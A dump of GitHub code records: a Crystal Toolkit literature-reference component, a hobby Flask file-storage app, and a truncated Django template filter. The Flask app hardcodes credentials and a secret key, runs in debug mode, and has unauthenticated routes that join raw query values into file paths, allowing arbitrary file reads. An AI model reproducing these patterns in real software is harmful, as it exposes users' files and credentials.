{"api_name": "matplotlib.pyplot", "line_number": 92, "usage_type": "name"}]} +{"seq_id": "33439126042", "text": "import dash_core_components as dcc\nimport dash_html_components as html\n\nfrom dash.dependencies import Input, Output, State\nfrom dash.exceptions import PreventUpdate\n\nfrom crystal_toolkit.components.core import PanelComponent, MPComponent\nfrom crystal_toolkit.helpers.layouts import Label, Tag\n\nfrom pymatgen import Structure, MPRester\n\nimport re\n\nfrom pybtex.database.input.bibtex import Parser\nfrom pybtex.plugin import find_plugin\nfrom pybtex.style.formatting.unsrt import sentence, field\nfrom io import StringIO\n\nfrom bibtexparser import loads\n\nfrom habanero import Crossref\nfrom habanero.cn import content_negotiation\n\nimport codecs\nimport latexcodec\n\nimport os\n\nCROSSREF_MAILTO = os.environ.get(\"CROSSREF_MAILTO\", None)\n\nclass LiteratureComponent(PanelComponent):\n def __init__(self, *args, use_crossref=True, use_crossref_formatting=True, **kwargs):\n self.use_crossref = use_crossref\n self.use_crossref_formatting = use_crossref_formatting\n super().__init__(*args, **kwargs)\n\n @MPComponent.cache.memoize(timeout=self.mprester_cache_timeout)\n def get_materials_id_references(mpid):\n with MPRester() as mpr:\n references = mpr.get_materials_id_references(mpid)\n return references\n self.get_materials_id_references = get_materials_id_references\n\n @MPComponent.cache.memoize(timeout=0)\n def format_bibtex_references(references, use_crossref=True, custom_formatting=True):\n self._format_bibtex_references(references, use_crossref=use_crossref,\n custom_formatting=custom_formatting)\n self.format_bibtex_references = format_bibtex_references\n self.format_bibtex_references = format_bibtex_references\n\n @property\n def title(self):\n return \"Literature Mentions\"\n\n @property\n def description(self):\n return (\n \"The material loaded into Crystal Toolkit is matched against \"\n \"materials and their associated references in the Material \"\n \"Project database.\"\n )\n\n @property\n def loading_text(self):\n return \"Looking up journal entries. This is not currently pre-cached so may take up to a minute\"\n\n @staticmethod\n def _pybtex_entries_to_markdown(entries):\n \"\"\"Utility function to convert a BibTeX entries containing\n references into a Markdown string. Borrowed from propnet.\n \"\"\"\n\n # TODO: replace this, very messy\n\n Pybtex_style = find_plugin(\"pybtex.style.formatting\", \"plain\")()\n\n # hack so as to avoid messing with capitalization of formulae\n def format_title(self, e, which_field, as_sentence=True):\n formatted_title = field(which_field)\n if as_sentence:\n return sentence[formatted_title]\n else:\n return formatted_title\n\n Pybtex_style.format_title = format_title\n pybtex_style = Pybtex_style()\n\n Pybtex_md_backend = find_plugin(\"pybtex.backends\", \"markdown\")\n\n # hack to not print labels (may remove this later)\n def write_entry(self, key, label, text):\n self.output(\"%s\" % text)\n\n Pybtex_md_backend.write_entry = write_entry\n Pybtex_md_backend.symbols[\"newblock\"] = \" \\n>\"\n pybtex_md_backend = Pybtex_md_backend()\n\n entries_formatted = pybtex_style.format_entries(entries.values())\n output = StringIO()\n pybtex_md_backend.write_to_stream(entries_formatted, output)\n\n # add blockquote style\n references_md = \" \\n \\n\".join(\n [f\"> {md} \" for md in output.getvalue().split(\"\")]\n )\n\n return references_md\n\n @staticmethod\n def _bibtex_entry_to_author_text(entry, et_al_cutoff=3):\n entry = loads(entry).entries[0]\n if \"author\" not in entry:\n return \"\"\n authors = codecs.decode(entry[\"author\"], \"ulatex\")\n authors = re.sub(r\"\\s*{.*}\\s*\", \" \", authors).replace(\"{}\", \"\")\n authors = authors.split(\" and \")\n if len(authors) > et_al_cutoff:\n authors = authors[0:et_al_cutoff]\n if len(authors) > 1:\n return \", \".join(authors[0:-1]) + \" and \" + authors[-1]\n else:\n return \"\"\n\n @staticmethod\n def _item_to_journal_div(item):\n # journal, issue, volume, date-parts (year), pages\n\n contents = []\n\n if item[\"journal\"]:\n contents.append(html.I(item['journal']))\n else:\n return html.Div()\n\n if item[\"volume\"]:\n contents.append(html.Span(\", \"))\n contents.append(html.B(item['volume']))\n\n if item[\"issue\"]:\n contents.append(html.Span(f\" ({item['issue']})\"))\n\n if item[\"pages\"]:\n contents.append(html.Span(f\", {item['pages']}.\"))\n else:\n contents.append(html.Span(f\".\"))\n\n if item[\"date-parts\"][0]:\n contents.append(html.Span(f\" {item['date-parts'][0][0] }.\"))\n\n return html.Div(contents, style={\"display\": \"inline-block\"})\n\n def _get_references_for_mpid(self, use_crossref=True, custom_formatting=True):\n return ...\n\n def update_contents(self, new_store_contents):\n \"\"\"\n Structure -> mpid -> BibTeX references from MP -> (optional doi lookup\n via Crossref) -> formatting.\n Formatting is very messy right now.\n DOI lookup and (possibly) formatting should be cached in a builder.\n \"\"\"\n\n struct = self.from_data(new_store_contents)\n\n if not isinstance(struct, Structure):\n raise PreventUpdate(\n \"Literature mentions can only be retrieved for crystallographic \"\n \"structures at present and not molecules. Please make a feature \"\n \"request if this would be useful for you, and it will be \"\n \"prioritized.\"\n )\n\n with MPRester() as mpr:\n mpids = mpr.find_structure(struct)\n\n if len(mpids) == 0:\n raise PreventUpdate(\n \"No structures in the Materials Project database match this \"\n \"crystal structure, so literature mentions cannot be retrieved. \"\n \"Please submit this structure to Materials Project if you'd \"\n \"like it to be added to the Materials Project database.\"\n )\n\n all_references = []\n for mpid in mpids:\n all_references.append(mpr.get_materials_id_references(mpid))\n self.logger.debug(f\"Retrieved references for {mpid}.\")\n\n if self.use_crossref:\n\n cr = Crossref(mailto=CROSSREF_MAILTO)\n individual_references = set()\n for references in all_references:\n individual_references.update(set(references.split(\"\\n\\n\")))\n\n # exclude Materials Proect references (these are intended to be\n # references for the structure specifically)\n refs_to_remove = set()\n for ref in individual_references:\n if \"Jain2013\" in ref:\n refs_to_remove.add(ref)\n individual_references -= refs_to_remove\n\n works = [cr.works(query=ref, limit=1) for ref in individual_references]\n self.logger.debug(f\"Retrieved {len(works)} works from Crossref.\")\n\n items = [\n work[\"message\"][\"items\"][0]\n for work in works\n if len(work[\"message\"][\"items\"]) > 0\n ]\n\n dois_to_item = {\n item[\"DOI\"]: {\n \"cited-by\": item.get(\"is-referenced-by-count\", 0),\n \"score\": item[\"score\"],\n \"title\": item.get(\"title\", None),\n \"authors\": item.get(\"author\", []),\n \"journal\": item.get(\"container-title\", [None])[0],\n \"issue\": item.get(\"issue\", None),\n \"volume\": item.get(\"volume\", None),\n \"pages\": item.get(\"page\", None),\n \"date-parts\": item.get(\"issued\", {}).get(\"date-parts\", [[None]]),\n }\n for item in items\n if item[\"score\"] > 40\n }\n\n num_refs = len(dois_to_item)\n sorted_dois = sorted(\n list(dois_to_item.keys()),\n key=lambda doi: -dois_to_item[doi][\"cited-by\"],\n )\n\n if self.use_crossref_formatting:\n # use Crossref to retrieve pre-formatted text\n\n # remove leading \"1. \" from Science CSL style\n refs = {\n doi: content_negotiation(ids=doi, format=\"text\", style=\"science\")[\n 3:\n ]\n for doi in dois_to_item.keys()\n }\n self.logger.debug(\n f\"Retrieved {len(refs)} formatted references from Crossref.\"\n )\n md = \" \\n\\n\".join(\n f\"> [{refs[doi]}](https://dx.doi.org/{doi}) \"\n f\"Cited by {dois_to_item[doi]['cited-by']}.\"\n for doi in sorted_dois\n )\n formatted_references = dcc.Markdown(\n md, className=\"mpc-markdown\"\n )\n\n else:\n # else retrieve BibTeX entries to extract a nice author list\n # and perform our own formatting\n\n entries = {\n doi: content_negotiation(ids=doi, format=\"bibtex\")\n for doi in sorted_dois\n }\n\n formatted_entries = []\n for doi, entry in entries.items():\n author_string = self._bibtex_entry_to_author_text(entry)\n journal_div = self._item_to_journal_div(dois_to_item[doi])\n\n formatted_entries.append(\n html.Blockquote(\n [\n html.A(\n [\n html.Div(\n [\n html.I(\n # necessary since titles can contain HTML for superscripts etc.\n dcc.Markdown(\n dois_to_item[doi][\"title\"],\n dangerously_allow_html=True\n )\n )\n ]\n ),\n html.Div([author_string]),\n html.Div(\n [\n journal_div,\n html.Span(\n f\" Cited by {dois_to_item[doi]['cited-by']}.\"\n ),\n ]\n ),\n ],\n href=f\"https://dx.doi.org/{doi}\",\n )\n ],\n className=\"mpc\",\n style={\"padding-left\": \"1rem\", \"margin-bottom\": \"1rem\"}\n )\n )\n\n formatted_references = html.Div(formatted_entries)\n else:\n # this uses pybtex directly on stored BibTeX entries from MP\n # most-accurate references and faster since no Crossref lookup\n # is required but no dois/hyperlinks available\n all_entries = {}\n for references in all_references:\n all_entries.update(Parser().parse_string(references).entries)\n md = self._pybtex_entries_to_markdown(all_entries)\n formatted_references = dcc.Markdown(md, className=\"mpc-markdown\")\n num_refs = len(all_entries)\n\n return html.Div(\n [\n Label(f\"{num_refs} references found{':' if num_refs>0 else '.'}\"),\n formatted_references,\n ],\n style={\"max-height\": \"20rem\", \"overflow-y\": \"scroll\"},\n )\n", "repo_name": "mattmcdermott/synthesis-app", "sub_path": "crystal_toolkit/components/literature.py", "file_name": "literature.py", "file_ext": "py", "file_size_in_byte": 12526, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "86", "api": [{"api_name": "os.environ.get", "line_number": 29, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 29, "usage_type": "attribute"}, {"api_name": "crystal_toolkit.components.core.PanelComponent", "line_number": 31, "usage_type": "name"}, {"api_name": "pymatgen.MPRester", "line_number": 39, "usage_type": "call"}, {"api_name": "crystal_toolkit.components.core.MPComponent.cache.memoize", "line_number": 37, "usage_type": "call"}, {"api_name": "crystal_toolkit.components.core.MPComponent.cache", "line_number": 37, "usage_type": "attribute"}, {"api_name": "crystal_toolkit.components.core.MPComponent", "line_number": 37, "usage_type": "name"}, {"api_name": "crystal_toolkit.components.core.MPComponent.cache.memoize", "line_number": 44, "usage_type": "call"}, {"api_name": "crystal_toolkit.components.core.MPComponent.cache", "line_number": 44, "usage_type": "attribute"}, {"api_name": "crystal_toolkit.components.core.MPComponent", "line_number": 44, "usage_type": "name"}, {"api_name": "pybtex.plugin.find_plugin", "line_number": 75, "usage_type": "call"}, {"api_name": "pybtex.style.formatting.unsrt.field", "line_number": 79, "usage_type": "call"}, {"api_name": "pybtex.style.formatting.unsrt.sentence", "line_number": 81, "usage_type": "name"}, {"api_name": "pybtex.plugin.find_plugin", "line_number": 88, "usage_type": "call"}, {"api_name": "io.StringIO", "line_number": 99, "usage_type": "call"}, {"api_name": "bibtexparser.loads", "line_number": 111, "usage_type": "call"}, {"api_name": "codecs.decode", "line_number": 114, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 115, "usage_type": "call"}, {"api_name": "dash_html_components.I", "line_number": 131, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 133, "usage_type": "call"}, {"api_name": "dash_html_components.Span", "line_number": 136, "usage_type": "call"}, {"api_name": "dash_html_components.B", "line_number": 137, "usage_type": "call"}, {"api_name": "dash_html_components.Span", "line_number": 140, "usage_type": "call"}, {"api_name": "dash_html_components.Span", "line_number": 143, "usage_type": "call"}, {"api_name": "dash_html_components.Span", "line_number": 145, "usage_type": "call"}, {"api_name": "dash_html_components.Span", "line_number": 148, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 150, "usage_type": "call"}, {"api_name": "pymatgen.Structure", "line_number": 165, "usage_type": "argument"}, {"api_name": "dash.exceptions.PreventUpdate", "line_number": 166, "usage_type": "call"}, {"api_name": "pymatgen.MPRester", "line_number": 173, "usage_type": "call"}, {"api_name": "dash.exceptions.PreventUpdate", "line_number": 177, "usage_type": "call"}, {"api_name": "habanero.Crossref", "line_number": 191, "usage_type": "call"}, {"api_name": "habanero.cn.content_negotiation", "line_number": 240, "usage_type": "call"}, {"api_name": "dash_core_components.Markdown", "line_number": 253, "usage_type": "call"}, {"api_name": "habanero.cn.content_negotiation", "line_number": 262, "usage_type": "call"}, {"api_name": "dash_html_components.Blockquote", "line_number": 272, "usage_type": "call"}, {"api_name": "dash_html_components.A", "line_number": 274, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 276, "usage_type": "call"}, {"api_name": "dash_html_components.I", "line_number": 278, "usage_type": "call"}, {"api_name": "dash_core_components.Markdown", "line_number": 280, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 287, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 288, "usage_type": "call"}, {"api_name": "dash_html_components.Span", "line_number": 291, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 305, "usage_type": "call"}, {"api_name": "pybtex.database.input.bibtex.Parser", "line_number": 312, "usage_type": "call"}, {"api_name": "dash_core_components.Markdown", "line_number": 314, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 317, "usage_type": "call"}, {"api_name": "crystal_toolkit.helpers.layouts.Label", "line_number": 319, "usage_type": "call"}]} +{"seq_id": "8560168722", "text": "from flask import Flask, jsonify, request, render_template, redirect, url_for,send_from_directory,send_file,render_template_string\n# from flask_jwt import JWT, jwt_required, current_identity\n# from flask_httpauth import HTTPDigestAuth\nfrom flask_login import LoginManager, UserMixin, login_required, login_user, logout_user \n# from flask_login import LoginManager, UserMixin, login_required, login_user\nfrom werkzeug.security import safe_str_cmp\nimport os\nimport json\nuser_name = \"denver\"\npass_word = \"am3plus\"\napp = Flask(__name__)\napp.config[\"UPLOADS\"] = \"storage/\"+user_name+\"/\"\napp.debug = True\napp.config['SECRET_KEY'] = 'super-secret'\n# app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///db.sqlite'\nlogin_manager = LoginManager()\nlogin_manager.init_app(app)\nlogin_manager.login_view = \"login\"\n\nclass User(UserMixin):\n\n def __init__(self, id):\n self.id = id\n self.name = user_name\n self.password = pass_word\n \n def __repr__(self):\n return \"%d/%s/%s\" % (self.id, self.name, self.password)\n\n\n# create some users with ids 1 to 20 \nusers = [User(id) for id in range(1, 21)]\n\n# auth = HTTPDigestAuth()\n\n# users = {\n# \"d\": \"d\",\n# \"susan\": \"bye\"\n# }\n\n# @auth.get_password\n# def get_pw(username):\n# if username in users:\n# return users.get(username)\n# return None\n@app.route(\"/upload-image\", methods=[\"GET\", \"POST\"])\n@login_required\ndef upload_image():\n if request.method == \"POST\":\n if request.files:\n image = request.files[\"image\"]\n print(image)\n image.save(os.path.join(app.config[\"UPLOADS\"], image.filename))\n return redirect(request.url) \n return render_template(\"upload_image.html\")\n# @auth.login_required\n\n@app.route(\"/\")\n@login_required\ndef main_page():\n return render_template(\"index.html\")\n\n@app.errorhandler(404)\ndef page_not_found(e):\n return render_template('404.html'), 404 \n\n@app.route(\"/login\", methods=[\"GET\", \"POST\"])\ndef login():\n if request.method == \"GET\":\n return render_template(\"login.html\")\n else:\n if request.form[\"password\"] == pass_word and request.form[\"login\"] == user_name:\n id = request.form[\"login\"]\n user = User(id)\n login_user(user)\n next = str(request.args.get('next'))\n if next != \"None\":\n print(next)\n return redirect(next)\n else: \n return redirect(\"/\")\n else:\n return render_template(\"login.html\", warning=\"Data incorrect!\")\n # if request.form[\"login\"] == \"denver\" and request.form[\"password\"] == \"am3plus\":\n # logged = 1\n # return redirect(\"/\")\n # else:\n # return render_template(\"login.html\", warning=\"Data incorrect!\")\n# @app.route('/uploads/', methods=['GET', 'POST'])\n# @login_required\n# def download(filename):\n# # Appending app path to upload folder path within app root folder\n# uploads = os.path.join(app.root_path, \"storage/avoccudleeee/\")\n# # Returning file from appended path\n# return send_from_directory(directory=uploads, filename=filename)\n@app.route('/uploads/', methods=['GET', 'POST'])\n# @login_required\ndef download():\n reponame = request.args.get('repo')\n filename = request.args.get('file')\n uploads = os.path.join(app.root_path, \"storage/\"+reponame+\"/\")\n print(uploads+filename)\n # return send_from_directory(directory=uploads, filename=str(filename))\n return send_file(uploads+filename, as_attachment=True)\n@app.route('/view-image/', methods=['GET', 'POST'])\n# @login_required\ndef view_image():\n reponame = request.args.get('repo')\n filename = request.args.get('file')\n uploads = os.path.join(app.root_path, \"storage/\"+reponame+\"/\")\n # print(uploads+filename)\n g = uploads+filename\n # return render_template(\"view_image.html\", image=str(g))\n return send_file(g, mimetype=\"image/png\")\n@app.route('/view-video/', methods=['GET', 'POST'])\n# @login_required\ndef view_video():\n reponame = request.args.get('repo')\n filename = request.args.get('file')\n uploads = os.path.join(app.root_path, \"storage/\"+reponame+\"/\")\n # print(uploads+filename)\n g = uploads+filename\n # return render_template(\"view_image.html\", image=str(g))\n return send_file(g, mimetype=\"video/mp4\")\n\n@app.route(\"/upload-file\", methods=[\"GET\", \"POST\"])\n@login_required\ndef upload_file():\n projects = os.listdir(\"storage/\")\n if request.method == \"POST\":\n if request.files:\n file = request.files[\"file\"]\n dsd = request.form.get(\"repos\")\n if os.path.exists(os.path.join(\"storage/\"+dsd+\"/\")):#, file.filename\n try:\n file.save(os.path.join(\"storage/\"+dsd+\"/\", file.filename))\n print(request.url[:-11]+\"view_repo?reponame=\"+dsd)\n return redirect((url_for(\"view_repo\")+\"?reponame=\"+dsd))\n except:\n return redirect((url_for(\"view_repo\")+\"?reponame=\"+dsd))\n else:\n os.mkdir(\"storage/\"+dsd+\"/\")\n file.save(os.path.join(\"storage/\"+dsd+\"/\", file.filename))\n return redirect((url_for(\"view_repo\")+\"?reponame=\"+dsd)) \n return render_template(\"upload_file.html\", proj=projects)\n\n@app.route(\"/create-repo\", methods=[\"GET\", \"POST\"])\n@login_required\ndef create_repo():\n if request.method == \"POST\":\n project_name = request.form.get('RepoName')\n if os.path.exists(os.path.join(\"storage/\"+project_name+\"/\")):\n return redirect(url_for(\"repo_list\"))\n else:\n os.mkdir(\"storage/\"+project_name)\n return redirect(url_for(\"repo_list\"))\n return render_template(\"new_repo.html\")\n\n@app.route(\"/list\", methods=[\"GET\", \"POST\"])\n@login_required\ndef repo_list():\n projects = os.listdir(\"storage/\")\n return render_template(\"repo_list.html\", data=projects)\n@app.route(\"/view_file\", methods=[\"GET\", \"POST\"])\n@login_required\ndef view_file():\n #?name=denver\n reponame = request.args.get('reponame')\n filename = request.args.get('filename')\n file = open(\"storage/\"+reponame+\"/\"+filename, 'r')\n data = file.read()\n file.close()\n #projects = os.listdir(\"storage/{}\".format(reponame))\n return render_template(\"view_file.html\", repo_name=reponame,data=data)\n@app.route(\"/view_repo\", methods=[\"GET\", \"POST\"])\n@login_required\ndef view_repo():\n #?name=denver\n reponame = request.args.get('reponame')\n projects = os.listdir(\"storage/{}\".format(reponame))\n return render_template(\"view_repo.html\",repo_name=reponame,data=projects)\n@app.route(\"/write-to-file\", methods=[\"GET\", \"POST\"])\n@login_required\ndef write_to_file():\n #?name=denver\n reponame = request.args.get('reponame')\n filename = request.args.get('filename')\n if request.method == \"GET\":\n return render_template(\"writee.html\",reponame=reponame,filename=filename)\n elif request.method == \"POST\":\n file = open(\"storage/\"+reponame+\"/\"+filename, 'w')\n file.write(request.form.get(\"code\"))\n file.close()\n return redirect(url_for(\".repo_list\"))\n@app.route(\"/logout\")\n@login_required\ndef logout():\n logout_user()\n return redirect(\"/login\")\n@login_manager.user_loader\ndef load_user(userid):\n return User(userid)\napp.run(host=\"0.0.0.0\",port=80)\n#http://127.0.0.1:5000/view_file?reponame=denver220&filename=main.txt", "repo_name": "denver-code/VSC-Denver", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 7251, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "86", "api": [{"api_name": "flask.Flask", "line_number": 11, "usage_type": "call"}, {"api_name": "flask_login.LoginManager", "line_number": 16, "usage_type": "call"}, {"api_name": "flask_login.UserMixin", "line_number": 20, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 49, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 49, "usage_type": "name"}, {"api_name": "flask.request.files", "line_number": 50, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 50, "usage_type": "name"}, {"api_name": "flask.request.files", "line_number": 51, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 51, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 53, "usage_type": "call"}, {"api_name": "os.path", "line_number": 53, "usage_type": "attribute"}, {"api_name": "flask.redirect", "line_number": 54, "usage_type": "call"}, {"api_name": "flask.request.url", "line_number": 54, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 54, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 55, "usage_type": "call"}, {"api_name": "flask_login.login_required", "line_number": 47, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 61, "usage_type": "call"}, {"api_name": "flask_login.login_required", "line_number": 59, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 65, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 69, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 69, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 70, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 72, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 72, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 73, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 73, "usage_type": "name"}, {"api_name": "flask_login.login_user", "line_number": 75, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 76, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 76, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 76, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 79, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 81, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 83, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 99, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 99, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 99, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 100, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 100, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 100, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 101, "usage_type": "call"}, {"api_name": "os.path", "line_number": 101, "usage_type": "attribute"}, {"api_name": "flask.send_file", "line_number": 104, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 108, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 108, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 108, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 109, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 109, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 109, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 110, "usage_type": "call"}, {"api_name": "os.path", "line_number": 110, "usage_type": "attribute"}, {"api_name": "flask.send_file", "line_number": 114, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 118, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 118, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 118, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 119, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 119, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 119, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 120, "usage_type": "call"}, {"api_name": "os.path", "line_number": 120, "usage_type": "attribute"}, {"api_name": "flask.send_file", "line_number": 124, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 129, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 130, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 130, "usage_type": "name"}, {"api_name": "flask.request.files", "line_number": 131, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 131, "usage_type": "name"}, {"api_name": "flask.request.files", "line_number": 132, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 132, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 133, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 133, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 133, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 134, "usage_type": "call"}, {"api_name": "os.path", "line_number": 134, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 134, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 136, "usage_type": "call"}, {"api_name": "os.path", "line_number": 136, "usage_type": "attribute"}, {"api_name": "flask.request.url", "line_number": 137, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 137, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 138, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 138, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 140, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 140, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 142, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 143, "usage_type": "call"}, {"api_name": "os.path", "line_number": 143, "usage_type": "attribute"}, {"api_name": "flask.redirect", "line_number": 144, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 144, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 145, "usage_type": "call"}, {"api_name": "flask_login.login_required", "line_number": 127, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 150, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 150, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 151, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 151, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 151, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 152, "usage_type": "call"}, {"api_name": "os.path", "line_number": 152, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 152, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 153, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 153, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 155, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 156, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 156, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 157, "usage_type": "call"}, {"api_name": "flask_login.login_required", "line_number": 148, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 162, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 163, "usage_type": "call"}, {"api_name": "flask_login.login_required", "line_number": 160, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 168, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 168, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 168, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 169, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 169, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 169, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 174, "usage_type": "call"}, {"api_name": "flask_login.login_required", "line_number": 165, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 179, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 179, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 179, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 180, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 181, "usage_type": "call"}, {"api_name": "flask_login.login_required", "line_number": 176, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 186, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 186, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 186, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 187, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 187, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 187, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 188, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 188, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 189, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 190, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 190, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 192, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 192, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 192, "usage_type": "name"}, {"api_name": "flask.redirect", "line_number": 194, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 194, "usage_type": "call"}, {"api_name": "flask_login.login_required", "line_number": 183, "usage_type": "name"}, {"api_name": "flask_login.logout_user", "line_number": 198, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 199, "usage_type": "call"}, {"api_name": "flask_login.login_required", "line_number": 196, "usage_type": "name"}]} +{"seq_id": "40595150126", "text": "from django import template\nfrom ..models import Abusebehav as Abuses\nfrom ..models import Mastscore as Masts\nfrom ..models import Psych\nimport re\n\nregister = template.Library()\n\n@register.filter(name='programtypes')\ndef programtype(progid):\n if progid == 1:\n return \"Random Alcohol Monitoring\"\n if progid == 2:\n return \"Continuous Trandermal Alcohol Monitoring\"\n if progid == 3:\n return \"Home Dentention and Random Alcohol Monitoring\"\n if progid == 4:\n return \"Home Detention Monitoring\"\n if progid == 5:\n return \"Home Detention and Secure, Continuous, Remote, Alcohol Monitoring\"\n if progid == 6:\n return \"Random Alcohol Monitoring ALT\"\n if progid == 7:\n return \"Sobriter\"\n if progid == 8:\n return \"Secure, Continuous, Remote, Alcohol Monitoring\"\n if progid == 9:\n return \"Ignition Interlock\"\n if progid == 10:\n return \"Alcohol Drug Screening\"\n if progid == 11:\n return \"Alcohol Drug Education\"\n if progid == 12:\n return \"Alcohol Drug Treatment\"\n if progid == 13:\n return \"Alcohol Drug Education UDDP\"\n if progid == 14:\n return \"Violation Diversion\"\n if progid == 15:\n return \"Revocation Review Packet\"\n if progid == 16:\n return \"Alcohol Education Diversion Program\"\n if progid == 17:\n return \"Domestic Violence\"\n if progid == 18:\n return \"PEACE (Anger Management)\"\n if progid == 19:\n return \"Domestic Violence PEACE Screening\"\n\n\n@register.filter(name='provider')\ndef 